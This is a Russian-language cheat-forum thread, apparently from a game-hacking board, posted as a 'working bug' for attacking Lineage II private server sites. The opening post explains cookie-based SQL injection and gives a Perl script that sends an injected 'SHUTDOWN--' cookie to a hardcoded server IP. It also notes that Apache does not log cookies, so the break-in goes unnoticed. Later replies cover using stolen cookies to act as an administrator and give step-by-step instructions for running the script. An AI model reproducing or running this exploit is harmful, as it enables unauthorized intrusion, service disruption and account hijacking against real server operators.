MegaChiter

Объявление

Кто хочет открыть хайд старых тем пишем админу в ЛС с ссылкой на тему.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » MegaChiter » Баги » Рабочий баг без хайда (С Новым годом!


Рабочий баг без хайда (С Новым годом!

Сообщений 1 страница 7 из 7

1

Cookies инъекция

Если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через
страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.

Возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на
la2.raid.ru или lineageii.ru)
Скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к. администраторы наверняка
сделали фильтр "зловредных символов".
Но у таких личных кабинетов есть своё уязвимое место.

Заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой
когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов.
Вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что
пользователь не сможет их править, а зря!

Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.

PHP код:
язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)
#!/usr/bin/perl -w
use IO::Socket;
use strict;
use CGI;
my $host = '212.33.232.148';
#здесь host - IP сервера на который посылается куки (в нашем случае это рейд)
my $EOL = "\015\012";
my $NL = "%0D%0A";
my $BLANK = $EOL x 2;
my $remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)");
unless ($remote)
{
die "cannot connect to http daemon on $host\n";
}
$remote->autoflush(1);
print
$remote
"GET /index.php HTTP/1.0".$EOL.
"Cookie: login=\'SHUTDOWN--".
$BLANK;
while (0 and <$remote>)
{
print;
# last if $. == 200;
}
close $remote;

У данной инъекции есть один весомый плюс:
апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их
взломали.

0

2

:cool:

0

3

Сделали мы иньекцию дальше то что?)))

0

4

diversantdead
а дальше вставляй куки и юзай под админом или кем то там у кого куки спиз***)

0

5

блин а мона поподробнее описать куда и как делать эту инъекцию куда что вводить - просто я только начинающий багоюзер(

0

6

качаешь перл, устанавливаешь создаешь тхт файл вставляешь код иньекции меняешь тхт расширение на pl переносишь на диск с заходишь пуск выполнить cmd и пишешь c://pelr/bin/perl.exe c://1.pl и нажимаешь ентер

0

7

z0mbie написал(а):

качаешь перл, устанавливаешь создаешь тхт файл вставляешь код иньекции меняешь тхт расширение на pl переносишь на диск с заходишь пуск выполнить cmd и пишешь c://pelr/bin/perl.exe c://1.pl и нажимаешь ентер

дай плиз ссылку на перл

0


Вы здесь » MegaChiter » Баги » Рабочий баг без хайда (С Новым годом!